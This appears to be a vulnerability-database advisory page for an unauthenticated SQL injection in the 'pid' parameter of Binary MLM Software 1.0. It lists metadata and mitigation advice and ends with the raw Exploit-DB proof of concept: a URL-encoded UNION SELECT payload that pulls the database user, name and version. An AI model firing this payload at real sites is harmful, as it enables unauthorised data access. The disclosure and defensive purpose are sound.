Binary MLM Software 1.0 - 'pid' SQL Injection

vendor:

Binary MLM Software

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Binary MLM Software

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mlmsoftwarez.in:binary_mlm_software:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Binary MLM Software 1.0 – ‘pid’ SQL Injection

An unauthenticated attacker can inject arbitrary SQL commands via the 'pid' parameter in the 'tree.php' script. By exploiting this vulnerability malicious users can compromise the application, access or modify sensitive data, exploit various SQL injection techniques such as SQL union and boolean-based blind, and execute arbitrary system commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection
# Dork: N/A
# Date: 2018-10-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://mlmsoftwarez.in/
# Software Link: http://mlmdemo.biz/binary/root.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# http://localhost/[PATH]/member/tree.php?pid=[SQL]

%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d